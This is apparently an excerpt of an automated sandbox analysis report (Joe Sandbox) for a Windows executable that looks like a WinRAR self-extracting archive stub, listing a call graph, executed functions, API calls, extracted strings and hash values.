28067 7ff6ca9d8090 47 API calls 28067->28080 28068 7ff6ca9c1fa0 31 API calls 28068->28080 28070 7ff6ca9de7c2 28075 7ff6ca9c1fa0 31 API calls 28070->28075 28071 7ff6ca9de648 28169 7ff6ca9d7eb0 47 API calls 28071->28169 28077 7ff6ca9de4db 28072->28077 28168 7ff6ca9dd0a0 33 API calls 28072->28168 28074 7ff6ca9de5cc 28084 7ff6ca9c129c 33 API calls 28074->28084 28090 7ff6ca9d8090 47 API calls 28074->28090 28095 7ff6ca9c1fa0 31 API calls 28074->28095 28100 7ff6ca9d32bc 51 API calls 28074->28100 28105 7ff6ca9de63a 28074->28105 28079 7ff6ca9de7cb 28075->28079 28076 7ff6ca9d32bc 51 API calls 28076->28080 28081 7ff6ca9c1fa0 31 API calls 28077->28081 28078 7ff6ca9de651 28083 7ff6ca9d51a4 9 API calls 28078->28083 28085 7ff6ca9c1fa0 31 API calls 28079->28085 28080->28063 28080->28065 28080->28067 28080->28068 28080->28074 28080->28076 28162 7ff6ca9d51a4 28080->28162 28082 7ff6ca9de4e5 28081->28082 28086 7ff6ca9c1fa0 31 API calls 28082->28086 28087 7ff6ca9de656 28083->28087 28084->28074 28088 7ff6ca9de7d5 28085->28088 28086->28055 28089 7ff6ca9de706 28087->28089 28096 7ff6ca9de661 28087->28096 28091 7ff6ca9f2320 _handle_error 8 API calls 28088->28091 28092 7ff6ca9dda98 48 API calls 28089->28092 28090->28074 28093 7ff6ca9de7e4 28091->28093 28094 7ff6ca9de74b AllocConsole 28092->28094 28093->27933 28097 7ff6ca9de755 GetCurrentProcessId AttachConsole 28094->28097 28098 7ff6ca9de6fb 28094->28098 28095->28074 28102 7ff6ca9daae0 48 API calls 28096->28102 28099 7ff6ca9de76c 28097->28099 28172 7ff6ca9c19e0 31 API calls _invalid_parameter_noinfo_noreturn 28098->28172 28107 7ff6ca9de778 GetStdHandle WriteConsoleW Sleep FreeConsole 28099->28107 28100->28074 28104 7ff6ca9de6a5 28102->28104 28103 7ff6ca9de7b9 ExitProcess 28106 7ff6ca9dda98 48 API calls 28104->28106 28105->28070 28105->28071 28108 7ff6ca9de6c3 28106->28108 28107->28098 28109 7ff6ca9daae0 48 API calls 28108->28109 28110 7ff6ca9de6ce 28109->28110 28170 7ff6ca9ddc2c 33 API calls 28110->28170 28112 7ff6ca9de6da 28171 7ff6ca9c19e0 31 API calls _invalid_parameter_noinfo_noreturn 28112->28171 28115 7ff6ca9ddd88 28114->28115 28116 7ff6ca9e9481 OleInitialize 28115->28116 28117 7ff6ca9e94a7 28116->28117 28118 7ff6ca9e94cd SHGetMalloc 28117->28118 28118->27936 28120 7ff6ca9e9a49 28119->28120 28122 7ff6ca9e9a4e BuildCatchObjectHelperInternal 28119->28122 28121 7ff6ca9c1fa0 31 API calls 28120->28121 28121->28122 28123 7ff6ca9c1fa0 31 API calls 28122->28123 28124 7ff6ca9e9a7d BuildCatchObjectHelperInternal 28122->28124 28123->28124 28125 7ff6ca9c1fa0 31 API calls 28124->28125 28128 7ff6ca9e9aac BuildCatchObjectHelperInternal 28124->28128 28125->28128 28126 7ff6ca9c1fa0 31 API calls 28127 7ff6ca9e9adb BuildCatchObjectHelperInternal 28126->28127 28127->27941 28128->28126 28128->28127 28130 7ff6ca9eb03e 28129->28130 28134 7ff6ca9eb046 28129->28134 28174 7ff6ca9e8624 FindResourceExW 28130->28174 28132 7ff6ca9eb063 28135 7ff6ca9e849c 4 API calls 28132->28135 28133 7ff6ca9eb04e GetObjectW 28133->28132 28134->28132 28134->28133 28136 7ff6ca9eb078 28135->28136 28137 7ff6ca9eb08a 28136->28137 28139 7ff6ca9e8624 11 API calls 28136->28139 28144 7ff6ca9eb0bf 28136->28144 28189 7ff6ca9e8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28137->28189 28139->28137 28140 7ff6ca9eb0a7 28141 7ff6ca9e84cc 4 API calls 28140->28141 28142 7ff6ca9eb0b2 28141->28142 28190 7ff6ca9e8df4 15 API calls _handle_error 28142->28190 28144->27966 28191 7ff6ca9d98dc 28145->28191 28147 7ff6ca9d98ba 28258 7ff6ca9da43c GetModuleHandleW FindResourceW 28147->28258 28149 7ff6ca9d98c2 28149->27971 28151 7ff6ca9f21d0 33 API calls 28150->28151 28152 7ff6ca9e67fa 28151->28152 28152->27978 28153->27959 28154->27977 28155->27982 28156->27985 28157->27988 28158->27979 28159->27994 28161 7ff6ca9f247a 28160->28161 28161->28039 28161->28161 28163 7ff6ca9d51c8 GetVersionExW 28162->28163 28164 7ff6ca9d51fb 28162->28164 28163->28164 28165 7ff6ca9f2320 _handle_error 8 API calls 28164->28165 28166 7ff6ca9d5228 28165->28166 28166->28080 28167->28049 28168->28072 28169->28078 28170->28112 28171->28098 28172->28103 28173->28064 28175 7ff6ca9e879b 28174->28175 28176 7ff6ca9e864f SizeofResource 28174->28176 28175->28134 28176->28175 28177 7ff6ca9e8669 LoadResource 28176->28177 28177->28175 28178 7ff6ca9e8682 LockResource 28177->28178 28178->28175 28179 7ff6ca9e8697 GlobalAlloc 28178->28179 28179->28175 28180 7ff6ca9e86b8 GlobalLock 28179->28180 28181 7ff6ca9e8792 GlobalFree 28180->28181 28182 7ff6ca9e86ca BuildCatchObjectHelperInternal 28180->28182 28181->28175 28183 7ff6ca9e86d8 CreateStreamOnHGlobal 28182->28183 28184 7ff6ca9e8789 GlobalUnlock 28183->28184 28185 7ff6ca9e86f6 GdipAlloc 28183->28185 28184->28181 28186 7ff6ca9e870b 28185->28186 28186->28184 28187 7ff6ca9e8772 28186->28187 28188 7ff6ca9e875a GdipCreateHBITMAPFromBitmap 28186->28188 28187->28184 28188->28187 28189->28140 28190->28144 28194 7ff6ca9d98fe _snwprintf 28191->28194 28192 7ff6ca9d9973 28268 7ff6ca9d68b0 48 API calls 28192->28268 28194->28192 28195 7ff6ca9d9a89 28194->28195 28198 7ff6ca9d99fd 28195->28198 28200 7ff6ca9c20b0 33 API calls 28195->28200 28196 7ff6ca9c1fa0 31 API calls 28196->28198 28197 7ff6ca9d997d BuildCatchObjectHelperInternal 28197->28196 28199 7ff6ca9da42e 28197->28199 28202 7ff6ca9d24c0 54 API calls 28198->28202 28201 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 28199->28201 28200->28198 28203 7ff6ca9da434 28201->28203 28204 7ff6ca9d9a1a 28202->28204 28205 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 28203->28205 28206 7ff6ca9d9a22 28204->28206 28214 7ff6ca9d9aad 28204->28214 28207 7ff6ca9da43a 28205->28207 28208 7ff6ca9d204c 100 API calls 28206->28208 28211 7ff6ca9d9a2b 28208->28211 28209 7ff6ca9d9b17 28260 7ff6ca9fa450 28209->28260 28211->28203 28213 7ff6ca9d9a66 28211->28213 28217 7ff6ca9f2320 _handle_error 8 API calls 28213->28217 28214->28209 28215 7ff6ca9d8e58 33 API calls 28214->28215 28215->28214 28216 7ff6ca9fa450 31 API calls 28229 7ff6ca9d9b57 __vcrt_FlsAlloc 28216->28229 28218 7ff6ca9da40e 28217->28218 28218->28147 28219 7ff6ca9d9c89 28220 7ff6ca9d2aa0 101 API calls 28219->28220 28232 7ff6ca9d9d5c 28219->28232 28223 7ff6ca9d9ca1 28220->28223 28221 7ff6ca9d2bb0 101 API calls 28221->28229 28222 7ff6ca9d28d0 104 API calls 28222->28229 28226 7ff6ca9d28d0 104 API calls 28223->28226 28223->28232 28224 7ff6ca9d204c 100 API calls 28227 7ff6ca9da3f5 28224->28227 28225 7ff6ca9d2aa0 101 API calls 28225->28229 28230 7ff6ca9d9cc9 28226->28230 28228 7ff6ca9c1fa0 31 API calls 28227->28228 28228->28213 28229->28219 28229->28221 28229->28222 28229->28225 28229->28232 28230->28232 28252 7ff6ca9d9cd7 __vcrt_FlsAlloc 28230->28252 28269 7ff6ca9e0bbc MultiByteToWideChar 28230->28269 28232->28224 28233 7ff6ca9da1ec 28248 7ff6ca9da2c2 28233->28248 28275 7ff6ca9fcf90 31 API calls 2 library calls 28233->28275 28235 7ff6ca9da157 28235->28233 28272 7ff6ca9fcf90 31 API calls 2 library calls 28235->28272 28236 7ff6ca9da14b 28236->28147 28239 7ff6ca9da249 28276 7ff6ca9fb7bc 31 API calls _invalid_parameter_noinfo_noreturn 28239->28276 28240 7ff6ca9da3a2 28242 7ff6ca9fa450 31 API calls 28240->28242 28241 7ff6ca9da2ae 28241->28248 28277 7ff6ca9d8cd0 33 API calls 2 library calls 28241->28277 28245 7ff6ca9da3cb 28242->28245 28243 7ff6ca9d8e58 33 API calls 28243->28248 28246 7ff6ca9fa450 31 API calls 28245->28246 28246->28232 28248->28240 28248->28243 28249 7ff6ca9da16d 28273 7ff6ca9fb7bc 31 API calls _invalid_parameter_noinfo_noreturn 28249->28273 28250 7ff6ca9da1d8 28250->28233 28274 7ff6ca9d8cd0 33 API calls 2 library calls 28250->28274 28252->28232 28252->28233 28252->28235 28252->28236 28253 7ff6ca9da429 28252->28253 28255 7ff6ca9e0f68 WideCharToMultiByte 28252->28255 28270 7ff6ca9daa88 45 API calls _snwprintf 28252->28270 28271 7ff6ca9fa270 31 API calls 2 library calls 28252->28271 28278 7ff6ca9f2624 8 API calls 28253->28278 28255->28252 28259 7ff6ca9da468 28258->28259 28259->28149 28261 7ff6ca9fa47d 28260->28261 28267 7ff6ca9fa492 28261->28267 28279 7ff6ca9fd69c 15 API calls _set_errno_from_matherr 28261->28279 28263 7ff6ca9fa487 28280 7ff6ca9f78e4 31 API calls _invalid_parameter_noinfo 28263->28280 28265 7ff6ca9f2320 _handle_error 8 API calls 28266 7ff6ca9d9b37 28265->28266 28266->28216 28267->28265 28268->28197 28269->28252 28270->28252 28271->28252 28272->28249 28273->28250 28274->28233 28275->28239 28276->28241 28277->28248 28278->28199 28279->28263 28280->28267 28281 7ff6ca9fd94c 28282 7ff6ca9fd997 28281->28282 28286 7ff6ca9fd95b _set_errno_from_matherr 28281->28286 28288 7ff6ca9fd69c 15 API calls _set_errno_from_matherr 28282->28288 28283 7ff6ca9fd97e HeapAlloc 28285 7ff6ca9fd995 28283->28285 28283->28286 28286->28282 28286->28283 28287 7ff6ca9fbbc0 _set_errno_from_matherr 2 API calls 28286->28287 28287->28286 28288->28285

                                                  Executed Functions

                                                  Function 00007FF6CA9EB190 Relevance: 118.7, APIs: 57, Strings: 10, Instructions: 1421windowfilesleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Item$Message$_invalid_parameter_noinfo_noreturn$Send$Text$File$ErrorLast$CloseDialogFindFocusLoadStringViewWindow$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleIdleInputLineMappingParamShellSleepTickTranslateUnmapWait
                                                  • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                  • API String ID: 2843345789-2702805183
                                                  • Opcode ID: 317428d4b19d084f719261a9800a4b17a93305193fd4149ad68c101a36b4f32a
                                                  • Instruction ID: 24f32671a31662884ee3bb8c0f88a70876f5402d79fa93014712c2a8d3102f1a
                                                  • Opcode Fuzzy Hash: 317428d4b19d084f719261a9800a4b17a93305193fd4149ad68c101a36b4f32a
                                                  • Instruction Fuzzy Hash: 9ED2E421A2868281EA20DF65F8662FA6361FF86782F404275D9CDC76E7DF3CE645C740
                                                  Function 00007FF6CA9ECE88 Relevance: 63.2, APIs: 25, Strings: 10, Instructions: 1963windowfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$FileMessageMoveSend$ItemPathTemp
                                                  • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                  • API String ID: 1275900774-3916287355
                                                  • Opcode ID: b617cc49474659d662a38eebf4ae2d5fc66c2f0afa935848dd26c524c1edde4e
                                                  • Instruction ID: 182eb61dd6fe6bc99bbf1f273cdabe0f6009ab24898cd70f40df8418798fd010
                                                  • Opcode Fuzzy Hash: b617cc49474659d662a38eebf4ae2d5fc66c2f0afa935848dd26c524c1edde4e
                                                  • Instruction Fuzzy Hash: BC13B032A24B8299EB10DF64E8622EC27B1FB40399F500575DA9DD7AEBDF38D585C340
                                                  Function 00007FF6CA9F0754 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 380filesleeptimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1474 7ff6ca9f0754-7ff6ca9f0829 call 7ff6ca9ddfd0 call 7ff6ca9d62dc call 7ff6ca9e946c call 7ff6ca9f3cf0 call 7ff6ca9e9a14 1485 7ff6ca9f0860-7ff6ca9f0883 1474->1485 1486 7ff6ca9f082b-7ff6ca9f0840 1474->1486 1489 7ff6ca9f0885-7ff6ca9f089a 1485->1489 1490 7ff6ca9f08ba-7ff6ca9f08dd 1485->1490 1487 7ff6ca9f0842-7ff6ca9f0855 1486->1487 1488 7ff6ca9f085b call 7ff6ca9f220c 1486->1488 1487->1488 1491 7ff6ca9f0ddd-7ff6ca9f0de2 call 7ff6ca9f7904 1487->1491 1488->1485 1493 7ff6ca9f08b5 call 7ff6ca9f220c 1489->1493 1494 7ff6ca9f089c-7ff6ca9f08af 1489->1494 1495 7ff6ca9f0914-7ff6ca9f0937 1490->1495 1496 7ff6ca9f08df-7ff6ca9f08f4 1490->1496 1512 7ff6ca9f0de3-7ff6ca9f0e2f call 7ff6ca9f7904 call 7ff6ca9f1900 1491->1512 1493->1490 1494->1491 1494->1493 1499 7ff6ca9f096e-7ff6ca9f097a GetCommandLineW 1495->1499 1500 7ff6ca9f0939-7ff6ca9f094e 1495->1500 1497 7ff6ca9f090f call 7ff6ca9f220c 1496->1497 1498 7ff6ca9f08f6-7ff6ca9f0909 1496->1498 1497->1495 1498->1491 1498->1497 1506 7ff6ca9f0980-7ff6ca9f09b7 call 7ff6ca9f797c call 7ff6ca9c129c call 7ff6ca9ecad0 1499->1506 1507 7ff6ca9f0b47-7ff6ca9f0b5e call 7ff6ca9d6454 1499->1507 1504 7ff6ca9f0950-7ff6ca9f0963 1500->1504 1505 7ff6ca9f0969 call 7ff6ca9f220c 1500->1505 1504->1491 1504->1505 1505->1499 1532 7ff6ca9f09ec-7ff6ca9f09f3 1506->1532 1533 7ff6ca9f09b9-7ff6ca9f09cc 1506->1533 1516 7ff6ca9f0b60-7ff6ca9f0b85 call 7ff6ca9c1fa0 call 7ff6ca9f3640 1507->1516 1517 7ff6ca9f0b89-7ff6ca9f0cce call 7ff6ca9c1fa0 SetEnvironmentVariableW GetLocalTime call 7ff6ca9d3e28 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff6ca9eb014 call 7ff6ca9d98ac call 7ff6ca9e67b4 * 2 DialogBoxParamW call 7ff6ca9e68a8 1507->1517 1528 7ff6ca9f0e34-7ff6ca9f0e6a 1512->1528 1516->1517 1569 7ff6ca9f0cd3-7ff6ca9f0ce4 call 7ff6ca9e68a8 1517->1569 1534 7ff6ca9f0e6c 1528->1534 1539 7ff6ca9f0adb-7ff6ca9f0b12 call 7ff6ca9f797c call 7ff6ca9c129c call 7ff6ca9efd0c 1532->1539 1540 7ff6ca9f09f9-7ff6ca9f0a13 OpenFileMappingW 1532->1540 1537 7ff6ca9f09ce-7ff6ca9f09e1 1533->1537 1538 7ff6ca9f09e7 call 7ff6ca9f220c 1533->1538 1534->1534 1537->1512 1537->1538 1538->1532 1539->1507 1563 7ff6ca9f0b14-7ff6ca9f0b27 1539->1563 1544 7ff6ca9f0ad0-7ff6ca9f0ad9 CloseHandle 1540->1544 1545 7ff6ca9f0a19-7ff6ca9f0a39 MapViewOfFile 1540->1545 1544->1507 1545->1544 1548 7ff6ca9f0a3f-7ff6ca9f0a6f UnmapViewOfFile MapViewOfFile 1545->1548 1548->1544 1551 7ff6ca9f0a71-7ff6ca9f0aca call 7ff6ca9ea190 call 7ff6ca9efd0c call 7ff6ca9db9b4 call 7ff6ca9dbb00 call 7ff6ca9dbb70 UnmapViewOfFile 1548->1551 1551->1544 1566 7ff6ca9f0b42 call 7ff6ca9f220c 1563->1566 1567 7ff6ca9f0b29-7ff6ca9f0b3c 1563->1567 1566->1507 1567->1566 1570 7ff6ca9f0dd7-7ff6ca9f0ddc call 7ff6ca9f7904 1567->1570 1580 7ff6ca9f0cec-7ff6ca9f0cf3 1569->1580 1581 7ff6ca9f0ce6 Sleep 1569->1581 1570->1491 1583 7ff6ca9f0cf5 call 7ff6ca9e9f4c 1580->1583 1584 7ff6ca9f0cfa-7ff6ca9f0d1d call 7ff6ca9db8e0 call 7ff6caa2e0f0 1580->1584 1581->1580 1583->1584 1590 7ff6ca9f0d25-7ff6ca9f0d2c 1584->1590 1591 7ff6ca9f0d1f call 7ff6caa2e0f0 1584->1591 1593 7ff6ca9f0d2e-7ff6ca9f0d35 1590->1593 1594 7ff6ca9f0d48-7ff6ca9f0d59 1590->1594 1591->1590 1593->1594 1595 7ff6ca9f0d37-7ff6ca9f0d43 call 7ff6ca9cba0c 1593->1595 1596 7ff6ca9f0d6d-7ff6ca9f0d7a 1594->1596 1597 7ff6ca9f0d5b-7ff6ca9f0d67 call 7ff6ca9efe24 CloseHandle 1594->1597 1595->1594 1600 7ff6ca9f0d9f-7ff6ca9f0dd6 call 7ff6ca9e94e4 call 7ff6ca9f2320 1596->1600 1601 7ff6ca9f0d7c-7ff6ca9f0d89 1596->1601 1597->1596 1604 7ff6ca9f0d8b-7ff6ca9f0d93 1601->1604 1605 7ff6ca9f0d99-7ff6ca9f0d9b 1601->1605 1604->1600 1608 7ff6ca9f0d95-7ff6ca9f0d97 1604->1608 1605->1600 1606 7ff6ca9f0d9d 1605->1606 1606->1600 1608->1600
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDirectoryModuleProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                  • API String ID: 3400486126-3710569615
                                                  • Opcode ID: 2d4a4130c046c56cdd5081655fe00bd0fcd3280ef1f87c25077d8b113e32ed81
                                                  • Instruction ID: f2827d0ea797e8e101b0599d89229e064e300529c6d5fda3103bb9a82c618bf9
                                                  • Opcode Fuzzy Hash: 2d4a4130c046c56cdd5081655fe00bd0fcd3280ef1f87c25077d8b113e32ed81
                                                  • Instruction Fuzzy Hash: 9912A531A18B8285EB109F65FC662B96361FF84786F404275EADDC7AA6EF3CE151C700
                                                  Function 00007FF6CA9DA4AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
                                                  • String ID: $%s:$CAPTION
                                                  • API String ID: 2100155373-404845831
                                                  • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                  • Instruction ID: 6c806a09204ae6b2bb9ee29a65141d054cf9f85b9eb7327a12aaee393da76677
                                                  • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                  • Instruction Fuzzy Hash: 6D912B32B2864186E714CF79F815669ABA1F784B85F405535EE8E87B99CF3CE846CB00
                                                  Function 00007FF6CA9E8624 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 101memorywindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                  • String ID: PNG
                                                  • API String ID: 211097158-364855578
                                                  • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                  • Instruction ID: 26edf098170ee7c13d2bbea8b973bd8b48c2c3d61c2e88cc52e5867997edbb65
                                                  • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                  • Instruction Fuzzy Hash: EB417121B19B4685EF048F96F86837963A0BF88B92F044475CD8EC7366EF3DE44A8340
                                                  Function 00007FF6CA9CF930 Relevance: 17.2, APIs: 8, Strings: 1, Instructions: 1417COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: __tmp_reference_source_
                                                  • API String ID: 3668304517-685763994
                                                  • Opcode ID: 0d642c38542e598360b72acbf0b8d61d3a64b3198fda17bd5702d85f02ad7b07
                                                  • Instruction ID: 4a6dc2e4330f125630ffa2246b4fa0a1f0450b8dc977f3f0f054255a2c7f544a
                                                  • Opcode Fuzzy Hash: 0d642c38542e598360b72acbf0b8d61d3a64b3198fda17bd5702d85f02ad7b07
                                                  • Instruction Fuzzy Hash: 83E2B462A286C242EA24DF25F1623AE6761FB81785F504176DBDEC36A7CF3CE495C700
                                                  Function 00007FF6CA9E9D90 Relevance: 16.6, APIs: 11, Instructions: 106COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Token$DescriptorInformationProcessSecurity$CopyCreateCurrentDaclDirectoryEntriesErrorFreeInitializeLastLocalOpen
                                                  • String ID:
                                                  • API String ID: 2740647886-0
                                                  • Opcode ID: decc2da6846149065e747433b686ffe20880dedc2611ac47de6390cb5f5191d4
                                                  • Instruction ID: ff81b82abe3987cac41dfd3e34c3393a30fe286648f4d5f8188c4394ea1a3395
                                                  • Opcode Fuzzy Hash: decc2da6846149065e747433b686ffe20880dedc2611ac47de6390cb5f5191d4
                                                  • Instruction Fuzzy Hash: DB51D232628B8286E7508FA1F8547ADB7B4FB88B85F500135EA8E97B55DF3CD445CB40
                                                  Function 00007FF6CA9C4840 Relevance: 12.1, APIs: 5, Strings: 1, Instructions: 1624COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
